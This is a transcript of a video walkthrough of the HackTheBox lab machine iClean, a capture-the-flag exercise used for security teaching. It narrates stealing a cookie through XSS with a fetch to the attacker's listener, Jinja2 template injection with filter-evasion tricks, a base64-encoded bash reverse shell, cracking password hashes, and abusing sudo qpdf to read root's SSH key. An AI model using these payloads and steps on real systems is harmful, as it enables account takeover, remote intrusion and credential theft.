What's going on YouTube? This is Ipsec. We're doing iClean from HackTheBox, where you're attacking a cleaning company. The first step here is gaining access to the admin panel, and you can do this by stealing a cookie through cross-site scripting. Thankfully, the HTTP only flag is not set, which makes the cross-site scripting payload really simple. Once you have access to the admin panel, one of the pages is vulnerable to server-side template injection. The website is running Python Flask, so the most likely language is Jinja 2. However, when you're trying to get a payload that does RCE, you'll discover there is a filter or web application firewall blocking some requests, so you have to do some late evasion in order to get a shell on the box. With that shell, you discover that you have pseudo access to a program called qpdf. It's probably what they use to build the PDF invoices for their clients. And looking at the man page for qpdf, you can see that you can attach files to the PDF, so you can use this pseudo rule in order to attach the flag or SSH key. With that being said, let's jump in. As always, we're going to start off with the nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us the TTL and things like that. OA output all formats, put in the nmap directory and call it iClean. Then the IP address of 10.10.11.12. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The first one is SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Apache running on Ubuntu, and we don't have much information other than that. So let's just go take a look at the site. So I'm going to go to 10.10.11.12, and it redirects us over to capiclean.htb. So let's go take a look at that virtual host. So I'm going to add it to my host file. We can do 10.10.11.12 capiclean.htb, and then refresh the page, and we get looks like a website of a cleaning service. So there is a login. That's the first thing I'm going to click. And then we can try like admin to see if that works. We get invalid username or password. I don't see any type of registration. I also want to look at the headers just to see if that exposes anything about the site. Maybe it'll have like the cookie name or things like that that can expose like what framework I'm looking at. So I'm going to send it. Look at the headers, and we see the server is workzug on Python. So I'm going to guess this is going to be a Flask application. We could try getting, administrator, which is for Django. So we could do like administrator, and we don't get it. The other indication why I thought Flask right away, other than the server header, is if it was Django, I would probably see other HTTP headers. It likes putting some like cross-site request forgery ones, a cookie I would expect. This looks like a minimal web page, which is why I thought Flask. So let's go just back to the page. And I want to have some type of recon going in the background. So I'm going to run a GoBuster. So we'll do GoBuster dir, HTTP, capiclean.htb, word list, opsec list, discovery, web content, raf small words.txt. There we go. -u. Okay, we probably should do a out file. Is it -o for out file? And we'll call it gobuster.root. There we go. So what I want to look at is any place I can send user input to this website. We have get a quote. We have a few names. We could have played more with that like login functionality. It said invalid username or password, but maybe if I gave it mpikes, it would say invalid password. All the socials look like they just go nowhere. We have contact at capiclean. Is this all one page? Looks like some various services. If we go to the get a quote, it looks like we can send things. So this looks like a contact type form. So let's make sure we intercept this request. And I'm going to click submit. And I did not send that through Burp. So let's send this. Okay. And it looks like for every service, it's just writing it. It gives our email. So I'm guessing this is a contact form, and it's just saying we want a quote for carpet cleaning and tile and grout. Now, since we looked at the result of this page, let me just send this to a repeater. It doesn't like show any information back to us, but we can still test for things like cross-site scripting by just putting like a image link, right? I'm just going to do a netcat listener on port 8000, and then we'll go over to repeater. Now, in most videos, when you see me testing for cross-site scripting, I normally test with like the bold parameter and see if the website filters that. But again, no data is reflected back to us. So I'm just going to try a image source is equal to HTTP 10.10.14.8 port 8000. And then we can just close out the image. Okay, that looks fine. I'm going to URL encode this. I don't think there's any bad characters, but better safe than sorry. And it looks like we're just playing the waiting game to see if anything clicks and goes back to us. So is there anything else we can look at on the page? So the contact form goes nowhere. So that's just a dead link. The team. So it looks like each of these links is part of this single web page. It's just instead of like using an anchor and scrolling directly to it, it has a separate page. So nothing too interesting there. If we go back to our netcat listener, we can see the box did reach back out to us. There we go, referral 127.0.0.1 port 3000. So it looks like the application is listening on port 3000 of the local host, and we have the user agent here. So what I want to do now is see if we can steal any cookies. This is generally the first thing I test for with cross-site scripting. Normally, I don't get lucky with it because the HTTP only is set on the cookie, which prevents this, but it only takes a second to test for. So it's one of the things I always like testing for, right? So we're going to change your thing to say image source is equal to X. And I'm just going to say on error is equal to fetch. And then we're going to add document.cookie. And we have to URL encode this. If we don't, it'll just be treated as a space, and that'll be bad JavaScript, right? So let's just URL encode that plus. And I think this is good, right? Let's just send this. I probably should add a K on that. The K is going to keep it open. So anytime it makes a request to us, if it makes a second one, it will still work, right? Let's see. Now, what else do we want to look at? The page is done. Oh, we have the cookie already. So we have a connection from 10.10.11.12, and we get a session. Now, this may look like a JWT, but this is probably just a Flask cookie, and I tell that right away by the middle parameter being super small. In JWT, this one would be much longer, right? So the data in a Flask cookie is the first piece. So we can just view what it is. So let's do echo-n base 64-d, not 65, 64. And we have role is equal to this string that looks like 32 characters. Let's just do echo-n wc-c. That is, so that's probably gonna be an MD5 something. If we Google it, it looks like it is the MD5 sum hash for admin. So the role is set to admin. Let's just set a cookie to that, right? Let's go back. Already scroll away. So we do session and then this. So I'll copy this. Let's go over to our browser. I'm actually going to go on that services page because there's something here that sometimes gets me when I always forget about this. So let's go ahead and add this cookie. So I'm going to go into my storage tab. Then we can click the plus. And then, what is it? Session. Make this bigger. Put the value. And then if we go back to the main page, there's nothing different. We still have this login, right? Now, there is one thing about this cookie, and that is the path. It's set to only work on services because that's the page I was on when I added it, right? So if I intercepted this request, so we go to proxy, intercept on, send this, I'm not sending any cookies because again, the path is just set, right? So whenever manually adding cookies in Firefox, you always want to test for that path and set it to /. So now if we send this, we also are sending the cookie and we still just get to the login. I expected it to redirect us to wherever a logged in user goes to. We can look at GoBuster again to see if there's anything. Logout sends A302. Dashboard sends A302. That is a redirect to just slash. I'm guessing dashboard is what we want. So let's go and take a look at dashboard. And then we have a few functions. We can generate invoice, generate QR, edit service, and quote request. So for generating invoice, let's just test for SSTI. So this is Python. It's probably going to be Jinja 2. This looks like a max length, so I can't put a 7 times 7. So we'll just do that. There. It probably actually wants an email address. Let's turn intercept on, generate, and where is the quantity? Put that there. Send it. We got an invoice number. So we go to generate QR, invoice ID, edit service, quote request. So let's enter the invoice ID. We get a link here. That goes to a QR. It wants us to insert the QR link. Maybe I can just do invoice ID. And we get this. The quantity is 77. So it did not perform any type of math, right? We inputted the parameter 7 times 7. And what I would expect is either 49, or if for some reason one of those 7s was treated as a string, it would be 1, 2, 3, 1, 2, 3, 4. Like these things would indicate some type of code was ran, but it just being 7, 7, I think it just stripped out the special characters, right? So 49 doesn't really, or 77 doesn't surprise me. Looking at email, that looks fine. 77 everywhere else. The QR code is blank there. We could edit services. Let's see, is anything here? 137.89. That doesn't look like it reflects. I don't know what edit services does. If we look at the source code where that QR code is, let's see, QR code. We see base 64 36562. This is the order ID. So it just reflected the order ID right where that base 64 is. So the first thing I did is tested for, or put the whole link in actually. So we can copy this link, paste it. And then if we look, we have an actual QR code now. And again, it's doing that image PNG base 64. So the first thing I tested for was, what is it? Cross-site request forgery, I think is the right terminology. I'm trying to make the page, or server-side request forgery. That's what I meant to say, SSRF. I try to make the server make a request back to me, right? I put a URL, it got the actual QR code. So what I'm going to do is put my IP, so 10.10.14.8, port 8000. Send this. That is blank, and the server never reached back out to me. So there may be some type of filter there that is checking the link before it actually goes to it. I'm not exactly sure. The one thing we learned from the phishing is the server also listened on 127.0.0.1 port 3000. So that's something else I can try. So we can try this to see if it actually gets a QR code image. And it doesn't. So it looks like that filter does need to have qpdf in it, I'm guessing. Because this should work from the server. Again, we saw that was set with the referral. Where is it? Right here. That's how this cookie stealer was working. So the other thing we could test for is putting SSTI in the QR code, right? So we do submit. We look at where the QR code is. And we get 49. So we have valid SSTI here. So let's go find a payload. So I'm going to go Google SSTI payload all the things. And let's see. Server-side template injection. Ginger 2. Go to basic injection. It's talking about this. The other thing we can do is dump the config. So let's go back here, config items, go to the QR code, and see if there's anything interesting here. We may want to just actually view the source code. And let's see. Debug is set to false. So we see all the key and items. So this is a secret key. This is probably used to sign the cookies. Let's see, permanent session lifetime, server name. Doesn't look like there's anything interesting here. Being able to sign cookies is nice, but we're already an admin. The other thing sometimes you can find is like database credentials. I don't see anything in here. So let's go and try another payload. This time, let's try getting code execution on the box through SSTI. So let's go to payload all the things. And let's see, where's the first one that gives us a thing? I guess we can try reading files, right? So let's go back here. Let's see, let's just close some windows so it's a bit quicker. Send this. We get an internal server error. So it did not like this payload. Let's see. Is the one that will just run a command right here, OSP open read. Send this. We also get an error. So it looks like all the complex SSTIs are failing, but when we kept it simple at like 7x7 or dumping the config, it worked. So at this point, I'm going to look for bypassing a lot of filters. And this payload, relatively complex. Let's go and paste it in. Actually, I think it's just running ID. So let's look at it. Okay, so we have this. We want to put our shell right here where it says ID. So let's go and build that. I'm going to do echo-n bash-i dev tcp 10.10.14.8 9001 0 and 1 base 64 encode it. And I'm also going to get rid of the special characters, which is pluses, because I really hate dealing with URL encoding. So doing that gets rid of all the special characters, just adding those 2 spaces. So we can copy it. And then go here where the payload is. I'm going to say, oh God. We'll do echo-n, paste this in, then base 64-d, and then pipe it over to bash. Okay, so we can cat the payload, copy it, and then let's stand up a listener. And we'll go over and send this payload. Submit. The server is taking a while to respond because we got a shell. So let's upgrade this real quick. So we can import pty spawn bin bash st2i raw minus echo foreground. What's going on? This is it from the future. And I want to put a segment here just understanding exactly how this evasion's working. Because if you ever get into a situation where you're evading some type of rule-based detection and you're grabbing stuff from the internet, chances are there's probably a rule made for the thing you grab from the internet and it won't work. So you'll need to understand how the evasion works so you can tweak it slightly and bypass the new signatures made. So let's take a look at this, right? We're going to just run this manually through a Flask application and kind of understand what's going on. But the 5Fs, this is really just underscores. It's just how to handle encoding in Python. But I have created a quick Flask app here. We can just see it's going to have a page en route, and we're just going to set a breakpoint as soon as it gets hit, right? So that will let us get into a debug mode of where Flask is. So let's run this app. So we'll do Python 3 app.py, and then I'll just curl localhost 5000, and we get here. So what they're doing is getting into the request object. So the request object's passed into Jinja 2 and everything, because if you wanted to grab like an argument, you'd get like the args out of it. And we could go, or param, right? I think param is also here, maybe. But this is how you get arguments, what the user sent into your Jinja template. Now, because we're passing the whole request, is it a class? Request class, we have access to other things, right? So this whole pipe attribute thing, that's just getting the application. So if we do request.application, we're here. And then it's going to go and get globals. So we go and grab globals. And in Python, when you access the globals, from here we can kind of just do a chain to import things. And right here, they're doing attribute get items, because we're not going to do a period because it's item. We're getting an item out of the globals, right? What is global? This is a dictionary. So we want to grab the built-ins, right? Yep, the built-ins. And again, I did not put a period there because, again, it was the get item. And let's just keep it single quotes because that's what the payload does, but it really doesn't matter what quotes you do. So now we're in globals and then built-ins. And what we want to do is a get item. So we're going to do it in brackets and we grab import. So we're going to grab this, import. And now we're in the function import. And what they're going to do is call OS. So we imported OS, and I want to say it's just popen the command we want, so we can do id.read. Is that it? There we go. So in Python, whenever you have a string, you can replace like this. So is it 5f they did? That still works because that is a underscore. Now, you could also do Unicode. So like \u005f in case there was a filter around hex. We can go to Unicode. We could also go into octal form. So if we did a man ASCII, look at underscore, that was hex. That's decimal. We could probably refer it to as decimal as well. We have octal form 137. So if we wanted to, we could go \137 instead of those underscores and get that working as well, right? There is going to be one weird catch in Python, and you'll almost never run into this. If for some reason you didn't have the request object, all functions in Python, I believe, also expose globals, so it could kind of work with it from the function as well. So if we just do the function of root, because if we go in code cat my app, we're broke right here, so we know this is the function, right? So if we go root globals, if I can spell correctly, that works. And then we want to go into built-ins. So we're just going to kind of replay the payload from above. We're going to run into an error, I think right here. There's no import. And that's going to be mainly because root is a function. And this is the first time I've ever found like a difference between a function and method, right? When request application was a method. So where do we want to go? We want to get into import. So if we do a dir here, we can see import is here. So instead of treating it like a item, it's just not, right? That's the only difference. So where is the full payload we had working? Let's go here. So we'll do underscore import os popen id read. Get rid of the dir, and that works. So if you wanted to look at this, there's one other just small interesting tidbit. If you're stepping through this, and we did root built-ins, we eventually saw this with the dir command, right? We saw import there. If we did dir on, what is it? Request application, we don't see an import. And that's again because this is now a dictionary, and when we do it as a function, it's a module. So Python under the hoods behaves slightly differently. Because that is a dictionary, you shouldn't enumerate it with just dir. You can do keys, and import should be a key, right? Import error, there it is up here. But yeah, that is how this evasion is working. The whole attribute thing, again, this is, I want to say, imported by Jinja 2. The reason why I'm not showing it is because my simple Flask app just doesn't have that imported. But you can replace those pipes with periods. That's probably escaping the need to do square brackets, right? There's a bunch of ways you can do evasion. So hope you guys enjoyed that. Let's get back to the box. And it looks like our terminal's already set. That's awesome. So we can clear the screen. And whenever I get a shell, I do always like just going back to the web server, making sure I'm not hanging it and the server still responds. Because every now and then when you run a request like this that just hangs the response, you could hang the server, especially when you see it's running straight to workzug Python, right? But it looks like the server is configured well, so let's see. What can we do here? Generally, whenever I land on a web app, I always look for like any type of database. We saw there was a login functionality, so I know there is a database. Doing an LSLA, I'm looking for like an environment file or a config file, looking at env to see if MySQL information is put in the environment, because that's generally how web services like working. But I don't see anything there. So let's just look at app.py and see. Oh, we have it right here, dbconfig. So we have iClean is the user, and the password is that. So let's do a MySQL-u iClean-p, paste in the password, show databases, use qpdf, show tables. We can do select star from users. Okay. So we have two users. I don't know what role this is, maybe guest or customer. We could just Google that MD5 and see what it says. Does this did it have a result? A copy it's user. So, okay, let's just do select username password from users. We can copy these two. And then v hashes.out, paste this in. Let's put it in a format that we like better. I'm going to get rid of all the spaces. We can get rid of any line that starts with a pipe, get rid of any line that ends with the pipe, and then we will replace the pipe with a colon. There we go. So what we want to do is see what type of hash this is. So we can echo-n, WCC 64. Is that like a SHA-1 sum? Echo SHA-1 sum. Looks like it. Awk print 1 WCC 41. It's probably a SHA-256 sum. It is. Let's see. So let's go over to CrackStation and just see if we can get any hits on this. So going to CrackStation, let's turn my dark mode on. That looks better. Copy that. I'm going to copy the admin as well. Normally I'd go straight to like Hashcat, but when you're just dealing with straight hashes, you can always just use CrackStation first to get a quick win. Maybe with this captcha, it's not as fast as just doing it manually. We got one hit, 0A29, and that is simple and clean. So that is going to be Consuela. So v hashes, I'm just going to put like that. And then we can say SSH Consuela at 10, 10, 11, was it 12? Paste it in. And we get on the box. If I do a LSLA, we got user.text there. Not much else. We can do a sudo -l, paste in the password, and we can run qpdf as root. So checking GTFO bins. Let's see if there's anything for qpdf. Does not look like it, which doesn't surprise me. GTFO bins is mainly just things that come on a system, right? qpdf is potentially a custom binary. Let's see. qpdf read the docs. Okay. There is a add attachment file. So this is probably going to be what we want to do. Let's see. How do we use qpdf? Let's just do -- help equals usage. Okay, let's see. qpdf in file options out file. Okay. Help equals add attachment. File name. Okay. So we have to get a PDF file. So let's just do find -name stir.pdf. Pipe it over to dev null. We have a PDF here. So we can use this as the in file. So I'm going to cp. Let's actually go to dev shm. We can copy this to in.pdf. And let's just do, what is it? qpdf in.pdf -- let's see. It's add attachment. And then we can say file name. Let's do etc passwd first. And then the out file will do out pdf. File name must be given as file name is equal. Missing 2 dashes. No file specified. Let's see. qpdf add attachment. Let's see how to do this. Add attachment. Oh, just the file name. Okay. And we can do list attachments and show attachments. So let's try list attachments. Attachment. Oh, I don't give it a in file. That's me probably not being able to spell. Okay, we got passwd. So we do show attachment equals passwd, and we can read that. So let's now try adding a different thing. So let's do add attachment, and we can add root ssh id rsa. See if the ssh key is there. Oh, we have to do a sudo. We can't write to out pdf because Consuela probably owns it. Let's just delete that, recreate it. And let's see, can we do show attachment now? Where's list? There we go. So show attachment, ID RSA. We get the SSH key. Let us add this. So we'll call it root.id RSA. Paste it in. Get rid of that trailing line break. chmod 600 sh-i root at 10, 10, 11, 12. And we rooted the box. So hope you guys enjoyed that. Take care, and I will see you all next time.